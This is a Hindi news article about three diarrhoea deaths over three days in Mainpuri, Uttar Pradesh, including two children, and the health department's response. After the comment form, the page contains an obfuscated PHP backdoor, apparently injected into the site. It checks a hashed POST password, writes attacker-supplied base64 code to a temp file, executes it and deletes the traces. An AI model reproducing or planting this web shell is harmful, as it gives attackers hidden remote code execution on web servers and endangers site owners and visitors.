उत्तर प्रदेश : तीन दिन से हो रहीं बच्चों की मौतें, अचानक होता उल्टी-दस्त और फिर थम गईं सांसें

Uttarakhand Press 16 September 2023: उत्तर प्रदेश के मैनपुरी में बुखार के साथ बढ़ रहे डायरिया के मरीज स्वास्थ्य विभाग की चुनौती बढ़ा रहे हैं। पिछले तीन दिन से लगातार डायरिया से पीड़ित मरीजों की मौत हो रही है। शनिवार को डायरिया से पीड़ित एक और बालक की मौत हो गई। पिछले तीन दिन में जिल में प्रतिदिन डायरिया से पीड़ित मरीजों की मौत हो रही हैं।

एलाऊ थाना क्षेत्र के गांव बिरतिया निवासी विमलेश के सात साल के पुत्र अंशु को शुक्रवार की रात अचानक उल्टी दस्त शुरू हो गए। परिजन उसे एक निजी डॉक्टर के यहां ले गए। उपचार में राहत न मिलने पर परिजन देर रात उसे जिला अस्पताल लेकर पहुंचे यहां डॉक्टरों ने उसे मृत घोषित कर दिया।

इससे पूर्व में दन्नाहार के चौरासी निवासी राजू के दो साल के पुत्र आयुष की शुक्रवार को डायरिया की दिक्कत के चलते मौत हो गई। थी। वहीं बृहस्पतिवार को शहर के मोहल्ला महमूद नगर निवासी परवेज की 23 वर्षीय पत्नी साबरा की मौत हो गई थी। पिछले तीन दिन में तीन मौतें स्वास्थ्य विभाग के लिए बुखार के बीच डायरिया की रोकथाम की चुनौती खड़ी कर रही हैं।

सीएमओ डॉ. आरसी गुप्ता ने सभी चिकित्साधीक्षकों को निर्देश दिए हैं कि वे बुखार के साथ-साथ डायरिया की रोकथाम के लिए भी पुख्ता इंतजाम किए जाएं। अस्पताल आने वाले बच्चों को समय से उपचार दिया जाए। सीएमएस डॉ. मदनलाल ने बताया कि बच्चे को मृत अवस्था में ही अस्पताल लाया गया था।

Read Previous

प्रधानमंत्री नरेंद्र मोदी कल करेंगे सबसे बड़े कन्वेंशन सेंटर का उद्घाटन, इन रास्तों से बचकर निकलें

Read Next

Dengue In Uttarakhand: उत्तराखंड में डेंगू का बरपा कहर, अब तक कुल 1663 मामलें, डेंगू के रोकथाम के लिए उठाए जा रहे ये कदम

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}